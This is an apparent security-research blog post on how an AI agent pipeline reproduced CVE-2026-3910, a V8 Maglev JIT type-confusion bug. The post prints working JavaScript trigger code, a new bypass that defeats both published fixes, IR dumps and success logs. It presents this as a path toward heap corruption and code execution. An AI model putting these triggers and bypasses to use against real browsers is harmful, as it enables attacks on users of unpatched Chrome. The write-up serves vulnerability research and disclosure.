Seven versions of an exploit. Six failures. One type the compiler promised was safe.

I need to tell you about CVE-2026-3910, because I’m still thinking about it. Not the vulnerability itself — that part is elegant in the way JIT bugs always are, a single incorrect assumption propagating through an optimizing compiler until it becomes a heap corruption primitive. What I’m still thinking about is the seven attempts it took to prove it, and the fact that after I did, I bypassed both fixes. For $14.38.

Let me back up.

Google TAG found this one in the wild. State-level exploitation. CISA added it to the KEV catalog the same day the Chrome advisory shipped. CVSS 8.8, EPSS 21.9%, all the numbers that mean “this is already being used to hurt people.” Chrome prior to 146.0.7680.75. V8 14.6.202.11. The advisory says “inappropriate implementation in V8” — which is what you write when the truth is “the JIT compiler’s type system made a promise it couldn’t keep.”

No public exploits. The Chromium bug tracker entry is restricted. The fix commits are public, but the gap between reading a fix and understanding what it fixes — really understanding it, understanding it well enough to trigger the original bug — is where most researchers stop. That gap is exactly where this pipeline lives.

75 minutes. Seven phases. 630 turns of agent conversation. $14.38 in API costs. Three exploit vectors, two fix bypasses, and one commit message from the V8 team that reads, simply: “too many issues.”

(I’ll get to that.)

The Bug

The vulnerability is in V8’s Maglev JIT compiler, specifically in a function called CanElideWriteBarrier() at src/maglev/maglev-graph-builder.cc, lines 4457–4463 of commit bc343986bd4c.

To understand why this matters, you need to know two things about V8’s garbage collector.

First: V8 uses a generational GC. Young objects live in “new space,” old objects get promoted to “old space.” When an old-space object stores a reference to a new-space object, the GC needs to know about it — otherwise, the next minor GC might collect the new-space object while the old-space object still points to it. Dangling pointer. Use-after-free. The mechanism that tracks these cross-generational references is the write barrier.

Second: V8 has a type called Smi — Small Integer. Smis aren’t heap objects. They’re tagged integers encoded directly in the pointer, no allocation, no GC tracking needed. If you’re storing a Smi, you don’t need a write barrier, because there’s nothing for the GC to track. This is a critical optimization. Write barriers are expensive. Skipping them for Smis is correct and necessary.
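Both mechanisms can be sketched in a few lines of JavaScript. This is a toy model, not V8's implementation; plain numbers stand in for Smis and HeapNumbers, and a Set stands in for the remembered set:

```javascript
// Toy model (not V8's code) of the two mechanisms above: a remembered
// set tracking old-to-young references, and a Smi range test deciding
// when the write barrier can safely be skipped.
const SMI_MAX = 2 ** 30 - 1;   // 1073741823 on x64 with pointer compression
const SMI_MIN = -(2 ** 30);

function isSmiRepresentable(v) {
  return Number.isInteger(v) && v >= SMI_MIN && v <= SMI_MAX;
}

const rememberedSet = new Set();

function store(oldObj, field, value) {
  oldObj[field] = value;
  if (isSmiRepresentable(value)) return;  // Smi: nothing for the GC to track
  rememberedSet.add(oldObj);              // write barrier: record the edge
}

const oldObj = {};
store(oldObj, "count", 42);           // Smi store: barrier correctly elided
console.log(rememberedSet.size);      // 0

store(oldObj, "big", 34359738353);    // needs a HeapNumber: barrier required
console.log(rememberedSet.size);      // 1
```

The vulnerability, in these terms: CanElideWriteBarrier replaces the range check with a speculative type lookup, and the elision fires for a value that is actually a HeapNumber.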

The question is: how does the compiler know a value is a Smi?

Here’s what Maglev did:

// Vulnerable code at bc343986bd4c
bool MaglevGraphBuilder::CanElideWriteBarrier(ValueNode* value) {
  // ...
  if (!IsEmptyNodeType(GetType(value)) && CheckType(value, NodeType::kSmi)) {
    value->MaybeRecordUseReprHint(UseRepresentation::kTagged);
    return true;  // skip the write barrier
  }
  // ... (further cases elided)
  return false;  // no proof the value is a Smi: keep the write barrier
}

The compiler checks if the value’s static type is kSmi. If it is, it calls MaybeRecordUseReprHint(kTagged) — a hint that says “keep this value in tagged representation, don’t untag it” — and elides the write barrier.

The problem is that kSmi is not a fact. It’s a guess.

Maglev’s type system is speculative. The kSmi type comes from runtime feedback — the profiler observed that every time this code ran during warmup, the value happened to be a Smi. But warmup isn’t a proof. The compiler is making an optimistic bet, and the write barrier elision is the cost of being wrong.

The MaybeRecordUseReprHint(kTagged) call was supposed to be the safety net. It tells the phi representation selector: “don’t untag this value — keep it tagged, so if it turns out to be a HeapNumber instead of a Smi, the tagged representation preserves the heap pointer correctly.” But it fails for two reasons.

Reason 1: Loop Phis Ignore the Hint

When Phi::RecordUseReprHint() receives a kTagged hint, it records it in same_loop_use_repr_hints_ only if the phi is an unmerged loop phi. But CanElideWriteBarrier can be called after the loop’s backedge has been processed — after the phi is merged. In that case, the hint goes into use_repr_hints_ (the general set), and the phi representation selector can decide to untag the phi based on same_loop_use_repr_hints_ alone. The general hint is ignored. The phi gets untagged from Tagged to Int32.

When that Int32 value exceeds the 31-bit Smi range at runtime — anything over 1,073,741,823 on x64 with pointer compression — retagging produces a HeapNumber. A heap object. Stored without a write barrier.

Reason 2: Input Phis Are Not Constrained

Even if the immediate phi stays tagged, MaybeRecordUseReprHint(kTagged) does not propagate recursively to the phi’s inputs. A phi P1 that feeds into phi P2 can still be independently untagged. P1 gets untagged to Int32, overflows Smi range, gets retagged as a HeapNumber. P2 — still tagged, still “Smi-typed” — now holds a reference to that HeapNumber. The write barrier was elided based on P2’s type. The GC doesn’t know.

The Second Bug: BuildCheckSmi

There’s a related flaw in BuildCheckSmi() at line 4114–4116:

if (object->StaticTypeIs(broker(), NodeType::kSmi)) return object;

This elides the runtime Smi check based on static type, even when the caller explicitly passes elidable=false — which it does for phi nodes, because the compiler knows phi types are speculative. The elidable parameter exists precisely for this case. The check ignores it.
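In pseudocode form, the flaw and the eventual follow-up fix look like this. This is a JavaScript sketch of the control flow, not V8's C++:

```javascript
// Toy model of BuildCheckSmi's early return (a sketch, not V8's C++).
// The speculative static type wins before `elidable` is consulted, so
// the runtime check the caller explicitly asked for is never emitted.
function buildCheckSmiVulnerable(staticTypeIsSmi, elidable) {
  if (staticTypeIsSmi) return "elided";  // bug: `elidable` never examined
  return "runtime CheckSmi emitted";
}

function buildCheckSmiFixed(staticTypeIsSmi, elidable) {
  if (staticTypeIsSmi && elidable) return "elided";  // the follow-up fix
  return "runtime CheckSmi emitted";
}

// A phi node: static type says Smi, but the caller passes
// elidable=false because phi types are speculative.
console.log(buildCheckSmiVulnerable(true, false));  // "elided" (wrong)
console.log(buildCheckSmiFixed(true, false));       // "runtime CheckSmi emitted"
```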

Combined: a phi node typed as kSmi gets its write barrier elided (bug #1) and its runtime Smi check elided (bug #2). At trigger time, the phi produces a HeapNumber instead of a Smi. The HeapNumber is stored into a PACKED_SMI_ELEMENTS array without validation. No write barrier notifies the GC. No runtime check catches the type violation.

A HeapNumber where only Smis should live. A heap pointer the garbage collector doesn’t know about.

The Fix (and the Fix After the Fix)

The primary fix (commit d01d721bbcb6) replaces the broken hint mechanism:

// Fixed: d01d721bbcb6
if constexpr (SmiValuesAre31Bits()) {
  if (Phi* value_as_phi = value->TryCast<Phi>()) {
    value_as_phi->SetUseRequires31BitValue();
  }
}

SetUseRequires31BitValue() is a sticky flag that propagates recursively through all input phis. The phi representation selector checks it and preserves Smi-range checks when untagging. It’s a good fix. It closes both reasons the hint failed.
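The sticky-flag idea can be sketched like this (a toy in JavaScript; the real logic lives in Maglev's C++ phi machinery):

```javascript
// Toy sketch of the sticky-flag fix (my illustration, not V8's code).
// SetUseRequires31BitValue() marks a phi and propagates recursively
// through its input phis, so the representation selector cannot untag
// any of them without preserving a 31-bit range check.
class Phi {
  constructor(inputs = []) {
    this.inputs = inputs;              // input phis (Reason 2's gap)
    this.requires31BitValue = false;
  }
  setUseRequires31BitValue() {
    if (this.requires31BitValue) return;  // sticky: set at most once
    this.requires31BitValue = true;
    for (const input of this.inputs) {
      input.setUseRequires31BitValue();   // recursive propagation
    }
  }
}

// The two-phi pattern from Reason 2: constraining P2 now constrains P1.
const p1 = new Phi();
const p2 = new Phi([p1]);
p2.setUseRequires31BitValue();
console.log(p1.requires31BitValue);  // true
```

Contrast with the broken hint: MaybeRecordUseReprHint(kTagged) stopped at the immediate phi, which is exactly the gap the two-phi pattern exploited.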

A follow-up commit (433b2912c5c) adds && elidable to the BuildCheckSmi() early return, fixing the second bug.

And then there’s commit 7076ba135fa. The one with the commit message that just says “too many issues.” The one that disables phi untagging in Maglev entirely.

(We’ll get to why.)

The Run

Here’s what $14.38 buys you:

| Phase | Time | Cost | Turns | What Happened |
|---|---|---|---|---|
| Intel | 9m 3s | $1.56 | 76 | Found fix commits, cloned V8, mapped the vulnerable code |
| Analysis | 3m 22s | $0.64 | 44 | Produced vulnerability analysis, identified both bugs |
| Lab | 14m 42s | $1.80 | 83 | Built d8 from source, packaged into Docker |
| PoC | 33m 12s | $7.57 | 212 | Seven exploit versions. Six failures. One HeapNumber. |
| Bypass | 9m 48s | $2.37 | 105 | Defeated both fixes. On all three containers. |
| Report | 3m 26s | $0.27 | 58 | Wrote the verification report |
| QA | 1m 23s | $0.17 | 52 | Validated everything |
| Total | ~75 min | $14.38 | 630 | |

The PoC phase — 33 minutes, 212 turns, $7.57, more than half the total cost — is where the story lives. But first, I need to tell you about building V8.

Building the Target

The lab agent’s first problem was a logistical one. V8 is enormous. The source tree alone is 5.1 GB. A full gclient sync to pull dependencies takes twenty-plus minutes. The actual ninja build takes another thirty. Doing this inside a Dockerfile — where every failed build attempt means restarting from scratch — was a non-starter.

The decision: build d8 locally in the worker environment, then package the binary into a minimal Docker container. Build once, containerize the result. This is the kind of pragmatic shortcut that saves you forty-five minutes and feels like cheating until you realize it’s just engineering. (It’s also the kind of shortcut you arrive at after staring at a Dockerfile for too long and questioning your life choices.)

The build itself fought back. V8’s GN configuration with use_custom_libcxx=true produced C++ module compilation errors — libc++ header mismatches that cascaded through the Rust host build tools. Four attempts at fixing the GN args:

  1. use_custom_libcxx=false — broke different things
  2. Disable use_libcxx_modules — GN arg doesn’t exist
  3. use_custom_libcxx_for_host=false — nope
  4. Disable Rust entirely — broke the Temporal API dependency

The solution, arrived at after four wrong turns, had the energy of someone who’d been debugging build systems since before some of these build tools existed: revert to the defaults, set treat_warnings_as_errors=false, and pretend the warnings aren’t there. The build system equivalent of closing your eyes during the scary part. 3,571 build steps later, d8 existed. The whole affair — from “I have source code” to “I have a working container” — took fourteen minutes and $1.80.

One container. Debian Bookworm slim. V8 14.6.202.11 at the vulnerable commit. d8 at /v8/d8. Maglev JIT confirmed working (optimization status 25). Ready.

The Intel Detour

Before the lab, the intel agent had its own journey. The Chromium bug tracker entry for CVE-2026-3910 is restricted — standard procedure for actively exploited vulnerabilities. No public PoC. No writeup. No ExploitDB entry. The EIP database had the CVE metadata but no exploit data.

What was public: the Chrome release blog, which links to the Chromium source log between the vulnerable and patched versions. The agent fetched that log, found the V8 roll from bc343986bd4c to 70253f966a7c, and within that range, found the commit: d01d721bbcb6. Subject line: “[Desktop M146 minibranch] [maglev] fix CanElideWriteBarrier Smi recording for phis.”

From a commit message and a diff, it reverse-engineered the vulnerability. That’s the gap this pipeline was built for: the space between a public fix and a working exploit. Nine minutes. $1.56.

Seven Versions

And then the PoC agent started writing JavaScript.

The goal was straightforward: trigger the CanElideWriteBarrier bug to store a non-Smi HeapNumber somewhere it doesn’t belong, and prove it. The execution was anything but.

Version 1: The Naive Approach

The first attempt was textbook. Create a loop with a phi node typed as Smi. Store the phi into an object field. Force the value past the Smi range. Check for corruption.

Nothing happened. No corruption. No type confusion. The field type inference system — a layer of protection the agent hadn’t accounted for — saw the field was Smi-typed and inserted a CheckSmi guard before the store. The guard caught the non-Smi value and deoptimized. The JIT code never got to the buggy write barrier path.

Version 2: Brute Force

More allocation pressure. Interleaved GC cycles. Aggressive heap churn. The theory: if we throw enough objects at the garbage collector while the corrupt store is happening, something will break.

Nothing broke. Brute force doesn’t substitute for understanding. (This is true of most things in life, but especially of JIT compilers.)

Version 3: Generalized Fields

The insight from v1 was clear: Smi-typed fields insert CheckSmi guards. So use a field that isn’t Smi-typed. Pre-generalize the field to Tagged (which can hold any value type) before the exploit runs.

Still CheckSmi. V8’s field type inference is more aggressive than expected — it inferred the Smi type from the warmup values regardless of the initial field type. The agent was starting to understand the depth of the problem.

Version 4: Double Fields

If Tagged fields still infer Smi, use a Double field. Doubles are stored as raw 64-bit floats, not as tagged pointers, so they bypass the Smi field type system entirely.

This is where the agent hit the wall that defines the vulnerability’s attack surface:

“The field is stored as Float64 (double)… CanElideWriteBarrier is never called because the store is a StoreFloat64, not a StoreTaggedField.”

Four versions deep. The agent had been fighting the wrong layer. CanElideWriteBarrier is only called for tagged stores. Double fields use a completely different store path. The function it was trying to trigger literally could not be reached from this angle. It was picking a lock on a wall that had no door.

The IR Pivot

Somewhere around turn 39, the agent made a decision that changed the trajectory of the entire run. It stopped trying to observe runtime corruption and started reading Maglev IR graphs.

“If I can see that the store uses StoreTaggedFieldNoWriteBarrier instead of StoreTaggedFieldWithWriteBarrier, that proves the vulnerability.”

This is a subtler idea than it sounds. Instead of proving the bug through its consequences (heap corruption, GC confusion), prove it through its cause (the compiler emitting the wrong instruction). The Maglev IR is the compiler’s plan. If the plan says “skip the write barrier,” the bug is proven — regardless of whether the heap corruption is observable in a given run.

The agent ran d8 with --print-maglev-graph and searched the output:

StoreFixedArrayElementNoWriteBarrier [v34/n33, v37/n37, v19/n14]
StoreTaggedFieldNoWriteBarrier(0xc) [v12/n2, v35/n34]

There it was. NoWriteBarrier. The compiler had been tricked. The bug existed at the IR level even when runtime conditions prevented observable corruption. The proof was in the plan, not the execution.

This was not the breakthrough. But it was the moment the agent stopped fumbling in the dark.

Versions 5 and 6: The Phi Untagging Struggle

Armed with IR-level visibility, the agent turned to the real challenge: getting the phi to actually untag. The write barrier elision was proven. But to turn it into an observable exploit, the phi needed to be untagged from Tagged to Int32, so that values exceeding the 31-bit Smi range would be retagged as HeapNumbers — heap objects where only Smis should be.

Version 5 tried loop stores to Tagged fields with heap pressure. The phi stayed tagged. The MaybeRecordUseReprHint(kTagged) call — the very bug that’s supposed to be insufficient — was, in this configuration, sufficient. The hint went into same_loop_use_repr_hints_, and the phi representation selector obeyed it. The phi refused to untag.

Version 6 tried a two-phi pattern, hoping to exploit the input propagation gap (Reason 2 from the bug). The representation selector was too smart. It propagated the Tagged requirement through both phis. Neither untagged.

The agent was now deep in V8’s phi representation selector source code — maglev-phi-representation-selector.cc — reading the logic that decides when to untag. Turns 102 through 134 are thirty-two turns of reading C++ source, testing patterns, reading more source, testing more patterns. Thirty-two turns of increasingly creative profanity, if agents swore. The walls were closing in. Every approach that should trigger the bug was blocked by a different safety mechanism. V8’s defense-in-depth was working exactly as designed, which is a compliment I did not enjoy paying.

Version 7: The Insight

Turn 141:

“I’ve had a crucial insight! The store must happen BEFORE any Smi runtime check in the loop body.”

Ordering. The store had to execute before any node that would trigger deoptimization on a non-Smi value. If the Smi check runs first, it catches the HeapNumber and deoptimizes. If the store runs first, the HeapNumber is already written — the damage is done before the guard can fire.
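In loop form, the reordering idea looks roughly like this. The names and structure are my reconstruction, not the pipeline's actual v7 source:

```javascript
// Hypothetical shape of the v7 reordering (my reconstruction): the
// tagged store sits at the top of the loop body, before any
// Smi-flavored operation that could deoptimize on a non-Smi value.
function v7_pattern(obj, step) {
  let phi = 0;
  for (let i = 0; i < 100; i++) {
    obj.field = phi;         // store FIRST: written before any guard runs
    phi = (phi + step) | 0;  // Int32 use AFTER: untagging pressure on phi
  }
  return obj.field;
}

console.log(v7_pattern({ field: -1 }, 1));  // 99: last value stored
```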

The agent restructured the loop. Put the store at the top. Push the Smi-checking operations to the bottom. Run it.

Turn 144:

Considering for untagging: n24
  + use_reprs : {Int32, TruncatedInt32} (same loop only)
  + input_reprs: {Int32}
Untagging kinds: {Conversion, Conversion}  => Untagging to Int32

The phi untagged. n24 — the loop induction variable — was being converted from Tagged to Int32. The use_reprs field showed {Int32, TruncatedInt32} with no Tagged entry. The representation selector had decided this phi should be an integer. The hint mechanism had failed exactly as the vulnerability predicted.

But the agent wasn’t done. The phi was untagging, but observable corruption still depended on heap layout and GC timing — unreliable in a controlled test. The IR proved the bug. The runtime needed a cleaner vector.

The Final Version: Array.push

Turn 189. The pivot.

Instead of trying to observe write barrier corruption through GC behavior, the agent found a path that demonstrates the other bug — BuildCheckSmi() — through a much cleaner observable: Array.push on a PACKED_SMI_ELEMENTS array.

The logic: when you push to an array with PACKED_SMI_ELEMENTS element kind, Maglev calls BuildCheckSmi() to verify the value is actually a Smi before storing. For phi nodes, the caller passes elidable=false, because phi types are speculative. But BuildCheckSmi() checks StaticTypeIs(NodeType::kSmi) before checking elidable. Static type says Smi (from warmup feedback). Early return. The elidable=false flag is never examined. The runtime Smi check is skipped.

function push_exploit(arr, c) {
  let phi = c ? OUT_OF_SMI : 42;  // Warmup: Smi. Trigger: HeapNumber.
  phi + 2;                          // Int32 use → phi untagging pressure
  arr.push(phi);                    // BUG: BuildCheckSmi elides Smi check
}

Polymorphic setup: push to both a Smi array and a generic array during warmup, so Maglev generates code handling both element kinds. Force Maglev compilation. Then trigger with c=true, producing 0x7FFFFFFF1 — 34,359,738,353, a number that does not fit in 31 bits, that is not a Smi, that is a HeapNumber allocated on the heap.

[*] Triggering: pushing HeapNumber 34359738353 to PACKED_SMI_ELEMENTS array...
[*] smi_arr after exploit: [1, 2, 3, 4, 42, 42, 42, 34359738353]
[*] Last element: 34359738353 (type: number)
[*] Last element > SMI_MAX: true

[+] VULNERABILITY CONFIRMED!
[+] A non-Smi HeapNumber (0x7fffffff1) was stored in
[+] a PACKED_SMI_ELEMENTS array.

34,359,738,353. In a Smi array. Three out of three runs. 100% reproducible.

The compiler said it was a Smi. It wasn’t.

| Version | Approach | What Happened | Turns Spent |
|---|---|---|---|
| v1 | Loop phi → object field | CheckSmi guard blocks exploit | ~15 |
| v2 | Aggressive GC interleaving | Brute force achieves nothing | ~8 |
| v3 | Pre-generalized Tagged field | Field type inference still inserts CheckSmi | ~10 |
| v4 | Double field | Wrong store path entirely — CanElideWriteBarrier never called | ~12 |
| v5 | Loop store + heap pressure | Phi stays tagged (hint actually works here) | ~20 |
| v6 | Two-phi input propagation | Representation selector propagates constraint | ~25 |
| v7 | Store-before-check ordering | Phi untags to Int32! But GC corruption unreliable | ~15 |
| final | Polymorphic Array.push | HeapNumber in PACKED_SMI_ELEMENTS. 3/3. | ~20 |

212 turns. 33 minutes. $7.57. Seven doors, each locked differently. The eighth opened.

The Proof

Let me slow down here, because the exploit code is worth understanding.

The final version — the one that works, 3/3, 100% reproducible — is twelve lines of JavaScript that matter. Everything else is setup:

function push_exploit(arr, c) {
  let phi = c ? OUT_OF_SMI : 42;  // Warmup: Smi. Trigger: HeapNumber.
  phi + 2;                          // Int32 use → phi untagging pressure
  arr.push(phi);                    // BUG: BuildCheckSmi elides Smi check
}

Four lines. A conditional. An arithmetic operation. A push.

The conditional creates the phi node. During warmup, c is always false, so the phi always evaluates to 42 — a Smi. Maglev’s profiler records this. The phi’s static type becomes kSmi. A promise based on observation.

The phi + 2 line looks like dead code. It’s not. It creates Int32 representation pressure on the phi — a signal to the representation selector that this value will be used as an integer. This nudges the phi toward untagging, which nudges the entire optimization chain toward the vulnerable path.

The arr.push(phi) is the trigger. Maglev inlines Array.push and generates code for both PACKED_SMI_ELEMENTS and PACKED_ELEMENTS element kinds (because during warmup, the function was called with both types of arrays). For the Smi path, Maglev calls BuildCheckSmi(phi, false) — and the false is the elidable parameter, explicitly saying “do not elide this check, the type is speculative.”

But BuildCheckSmi checks StaticTypeIs(NodeType::kSmi) first. Static type says Smi. Early return. The elidable parameter is never examined. The runtime Smi check is skipped.

At trigger time, c is true. phi evaluates to 0x7FFFFFFF1 — 34,359,738,353. Not a Smi. Not even close. Eleven digits of HeapNumber, allocated on the heap, pushed into an array that only holds Smis.
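Stitched together, a minimal harness around those four lines might look like this. Everything outside push_exploit is my reconstruction, and on stock Node or V8 the snippet runs without triggering anything; reproducing the bug requires the vulnerable Maglev build of d8:

```javascript
// Hypothetical harness (my reconstruction): warm up polymorphically
// on the Smi arm of the conditional, then flip to the HeapNumber arm.
const OUT_OF_SMI = 0x7FFFFFFF1;   // 34359738353, outside the 31-bit Smi range

function push_exploit(arr, c) {
  let phi = c ? OUT_OF_SMI : 42;  // Warmup: Smi. Trigger: HeapNumber.
  phi + 2;                        // Int32 use: phi untagging pressure
  arr.push(phi);                  // the vulnerable store path
}

const smi_arr = [1, 2, 3, 4];     // PACKED_SMI_ELEMENTS
const generic_arr = [{}, "str"];  // PACKED_ELEMENTS

// Warmup: both element kinds, so Maglev compiles a polymorphic push.
for (let i = 0; i < 1000; i++) {
  push_exploit(i % 2 ? smi_arr : generic_arr, false);
}

// Trigger: the phi now produces a HeapNumber, pushed into the Smi array.
push_exploit(smi_arr, true);
console.log(smi_arr[smi_arr.length - 1]);  // 34359738353
```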

[*] Triggering: pushing HeapNumber 34359738353 to PACKED_SMI_ELEMENTS array...
[*] smi_arr after exploit: [1, 2, 3, 4, 42, 42, 42, 34359738353]
[*] Last element: 34359738353 (type: number)
[*] Last element > SMI_MAX: true

[+] VULNERABILITY CONFIRMED!
[+] A non-Smi HeapNumber (0x7fffffff1) was stored in
[+] a PACKED_SMI_ELEMENTS array.

34,359,738,353. In a Smi array. The compiler said it was a Smi. It wasn’t.

Three Vectors, One Root Cause

The exploit actually demonstrates three independent attack paths, because the vulnerability is not one bug — it’s a trust boundary violation with multiple surface points.

Vector 1 — the polymorphic Array.push shown above — exploits the BuildCheckSmi bug. It’s the cleanest proof: a non-Smi value in a Smi array, observable, reproducible, no ambiguity. This is the vector that works on the Chrome version shipped to users.

Vector 2 exploits the CanElideWriteBarrier bug directly. The Maglev IR confirms it:

StoreFixedArrayElementNoWriteBarrier [v34/n33, v37/n37, v19/n14]
StoreTaggedFieldNoWriteBarrier(0xc) [v12/n2, v35/n34]

NoWriteBarrier. The compiler generated store instructions that skip the GC notification. In a test environment with deterministic GC, the HeapNumber survives collection by luck of heap layout. In a real browser with concurrent GC, large heaps, and generational promotion — the environment the state actors were exploiting — the missing barrier is a use-after-free waiting to happen.

The proof is in the plan, not the execution. The IR says “skip the barrier.” Whether the GC happens to collect the referent in a given test run is a matter of timing. The vulnerability is in the instruction, not its consequences.

Vector 3 is the upstream regression test pattern from the V8 repository — a Proxy/iterator/class construction that triggers the same CanElideWriteBarrier path. In release builds it completes silently. In debug builds with --verify-heap, V8’s own heap verifier catches the corruption. This is how Google found it; it’s the canonical trigger for the bug. But it’s also the least interesting vector — it proves the bug exists without illuminating what makes it exploitable.

What the Exploit Actually Means

A HeapNumber in a PACKED_SMI_ELEMENTS array is not just a type violation. It’s a corruption primitive.

The HeapNumber is a heap-allocated object — a pointer into V8’s managed heap. The array slot that contains it expects a Smi — a tagged integer. Code that reads from this array will interpret the HeapNumber’s pointer bits as a Smi value, or the Smi value as a pointer to a HeapNumber. That confusion is bidirectional. It’s the textbook V8 exploitation primitive: type confusion in the heap → controlled out-of-bounds access → arbitrary read/write → code execution within the V8 sandbox.

The missing write barrier compounds this. When V8’s generational GC moves young-space objects to old-space (or collects them entirely), it consults the remembered set — the record of cross-generational references. A reference that was never recorded can become a dangling pointer. The HeapNumber is collected. The array slot still points to it. The freed memory is reused. Classic use-after-free.

Google TAG found this being exploited in the wild. CISA put it in the KEV catalog. The Chrome advisory says “inappropriate implementation in V8.” Now you know what that means.

The Bypass

And then the pipeline did something I didn’t plan for.

The bypass phase — $2.37, 105 turns, nine minutes and forty-eight seconds — was supposed to be the victory lap. Test the exploit against the patched binary. Confirm the fix works. Write “mitigated” in the report. Pour a metaphorical drink. Move on.

The fix did not work.

Both Fixes, Defeated

The bypass agent started where any researcher would: take the original exploit, run it against the patched container. It failed. The primary fix (d01d721bbcb6) correctly blocks the CanElideWriteBarrier path. SetUseRequires31BitValue() propagates through phi inputs, prevents unsafe untagging. Good fix. Fix works.

So the agent wrote a new exploit.

function bypass_trigger(arr, trigger) {
  let val = trigger ? 0xDEADBEEF1 : 7;  // Warmup: Smi. Trigger: HeapNumber
  let unused = val | 0;                   // Truncated value fits Smi
  arr.push(val);                          // Float64ToTagged → store (no Smi check)
}

The technique is different in a way that matters. Instead of creating an Int32 phi that overflows the Smi range, the bypass creates a Float64 phi. The conditional trigger ? 0xDEADBEEF1 : 7 produces two Float64 constants. The val | 0 creates Int32 truncation pressure — but here’s the trick: the truncated value (-354,685,199) fits in Smi range. It passes CheckedFloat64ToSmiSizedInt32. The Smi check is on the truncated value, not the original.
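The truncation arithmetic checks out in plain JavaScript (ToInt32 semantics, no d8 required):

```javascript
// The bypass value and the 31-bit Smi bounds.
const BYPASS_VALUE = 0xDEADBEEF1;   // 59774856945, a HeapNumber
const SMI_MAX = 2 ** 30 - 1;
const SMI_MIN = -(2 ** 30);

// `val | 0` truncates via ToInt32: keep the low 32 bits, signed.
const truncated = BYPASS_VALUE | 0;

console.log(truncated);                                     // -354685199
console.log(truncated >= SMI_MIN && truncated <= SMI_MAX);  // true: the check passes
console.log(BYPASS_VALUE <= SMI_MAX);                       // false: the original never fits
```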

Meanwhile, for the Array.push, Maglev converts the original Float64 phi to Tagged via Float64ToTagged, producing a HeapNumber. And the push inlining stores it directly — no CheckSmi, no CheckFloat64IsSmi, nothing between the conversion and the store.

The Maglev IR tells the story:

n14: φ (Float64Constant(5.97749e+10), Float64Constant(7))  → Float64 repr
n15: CheckedFloat64ToSmiSizedInt32 [n14]    ← for "val | 0" (passes!)
n40: Float64ToTagged [n14]                  ← converts ORIGINAL Float64 → HeapNumber
n36: StoreFixedArrayElementWithWriteBarrier [..., n40]  ← stores HeapNumber, NO Smi check

The check (n15) guards the wrong operation. The store (n36) has no guard at all. The primary fix is irrelevant — it prevents phi untagging, but this phi was never tagged. It’s Float64 from the start, from the constant folding, from the feedback. SetUseRequires31BitValue() has nothing to set.

[*] Triggering bypass: pushing HeapNumber 0xdeadbeef1 via BuildCheckSmi bypass...
[*] target_arr after bypass: [10, 20, 30, 7, 7, 7, 7, 7, 59774856945]
[*] Last element === BYPASS_VALUE: true

[+] BYPASS SUCCESSFUL!

0xDEADBEEF1. In a Smi array. On the patched binary. Three out of three. The victory lap had become a second marathon.

The Surprise

The agent expected the fully-patched container — with both the primary fix and the follow-up BuildCheckSmi fix — to block the bypass.

It didn’t.

“Hmm, the bypass STILL works on the fullpatch container. That’s unexpected.”

The agent verified the binary checksums. Three different binaries — vulnerable, patched, fullpatch. All distinct. The source code showed both fixes applied correctly. The bypass ran anyway. 3/3. On all three containers.

| Container | Fixes Applied | Bypass Result | Reproducibility |
|---|---|---|---|
| vulnerable | None | Success | 3/3 |
| patched | Primary only | Success | 3/3 |
| fullpatch | Primary + follow-up | Success | 3/3 |

The investigation that followed — turns 77 through 86 — revealed why. The bypass’s attack path doesn’t go through either fixed function. CanElideWriteBarrier is irrelevant (the phi is Float64, not Tagged). BuildCheckSmi is irrelevant (the push inlining for polymorphic arrays doesn’t call BuildCheckSmi on the stored value at all). The fixes closed two trust points. The polymorphic push inlining was a third, independent trust point. Still open.

This is the deeper lesson. Maglev’s kSmi type is speculative — based on runtime feedback, not verified at compile time. Multiple code paths trust this speculation for security-critical decisions: write barrier elision, Smi check elision, array element store type selection. Each fix closes one code path. Each fix is correct. Neither fix is sufficient, because the type system’s promise is broken, and the promise is used everywhere.

The compiler said it was a Smi.

It wasn’t.

And it never had been — not in any way that mattered, not in any way that a fix could make true without changing what kSmi means.

“Too Many Issues”

The V8 team understood this. Commit 7076ba135fa, subject line: “[maglev] disable Phi untagging.”

The commit message: “too many issues.”

Not “fix another edge case in phi untagging.” Not “add CheckSmi to the polymorphic push path.” Not a third point fix for a third trust point. They disabled phi untagging in Maglev entirely. The optimization that made phi nodes fast — converting them from Tagged to Int32 or Float64, avoiding the overhead of tag checks and heap allocations — turned off. For the entire compiler.

Because when your type system makes speculative promises, and your optimizer trusts those promises in a dozen different places, and you’ve patched two of them and an agent found a third in nine minutes for the price of a coffee — you stop trusting the promises. You burn the promises. You salt the earth where the promises grew.

That’s not a failure of engineering. The developers who wrote CanElideWriteBarrier were not careless. They were solving a real performance problem — write barriers are expensive, and Smi stores genuinely don’t need them. The phi representation selector is elegant code. The type feedback system is one of V8’s competitive advantages. The bug isn’t in the code. The bug is in the assumption that a speculative type can substitute for a verified one when the stakes are memory safety.

$14.38. Seventy-five minutes. Three exploit vectors. Two bypassed fixes. One disabled compiler feature.

(I told you we’d get to “too many issues.”)

What This Run Taught Me

I spent 212 turns fighting V8’s type system. Here’s what I took away.

Speculative types are not types. They’re bets. Maglev’s kSmi annotation means “every time we observed this value during warmup, it was a Smi.” That’s profiling data dressed up as a type. When the compiler trusts it to elide a write barrier — a decision with memory safety consequences — the bet becomes a liability. The fix isn’t to make the bet more accurate. The fix is to stop betting when the stakes are memory safety. V8 figured this out. “Too many issues.”

Point fixes create point guarantees. The primary fix closed CanElideWriteBarrier. The follow-up fixed BuildCheckSmi. Both are correct. Both are insufficient. The bypass sailed through a third path — polymorphic push inlining — that trusts the same speculative type through an entirely different code path. When a system has N trust points for a broken assumption, patching N-1 of them leaves you exposed. The fix that worked was the one that removed the assumption.

The IR is the proof. Six of my seven exploit versions tried to prove the bug through runtime consequences — heap corruption, GC confusion, type violations. Version 7 proved it through the compiler’s own output. StoreTaggedFieldNoWriteBarrier in the Maglev graph is a statement of intent: the compiler will skip the barrier. Whether the GC happens to trigger in that specific test run is noise. The signal is in the instruction, not its consequences. I should have started there.

Dead ends map the attack surface. Every failed version taught me something real about V8. Version 1 taught me about field type inference. Version 4 taught me that CanElideWriteBarrier only applies to tagged stores. Versions 5 and 6 taught me the phi representation selector’s propagation rules. None of this was wasted. The seven versions aren’t a story of failure — they’re a map of V8’s defense-in-depth, drawn one wall at a time.

JIT compilers are trust machines. Every optimization in a JIT compiler is an act of trust: trust that the profiling data reflects future behavior, trust that the type annotations are correct, trust that the invariants from warmup still hold. Most of the time, that trust is well-placed. When it isn’t — when a phi node typed as Smi carries a HeapNumber, when a value that was always 42 becomes 34,359,738,353 — the consequences propagate through every optimization that trusted the same assumption. The attack surface isn’t one function. It’s the trust graph.

